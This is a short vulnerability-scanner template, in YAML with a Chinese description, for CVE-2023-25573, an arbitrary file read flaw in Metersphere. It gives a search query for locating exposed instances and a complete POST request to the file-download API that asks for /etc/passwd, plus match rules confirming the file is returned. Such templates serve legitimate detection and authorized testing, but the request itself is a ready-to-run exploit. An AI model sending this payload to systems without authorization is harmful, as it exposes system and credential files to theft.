漏洞描述
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包
FaFo: body="Metersphere"
id: CVE-2023-25573
info:
name: Metersphere 任意文件读取漏洞
author: wuha
severity: high
verified: true
description: |
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包
FaFo: body="Metersphere"
tags: cve,cve2023,metersphere,readfile
created: 2023/06/16
rules:
r0:
request:
method: POST
path: /api/jmeter/download/files
headers:
Content-Type: application/json
body: |
{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}
expression: response.status == 200 && response.raw_header.bcontains(b'filename="pass.zip"') && response.body.bcontains(b'/etc/passwd')
expression: r0()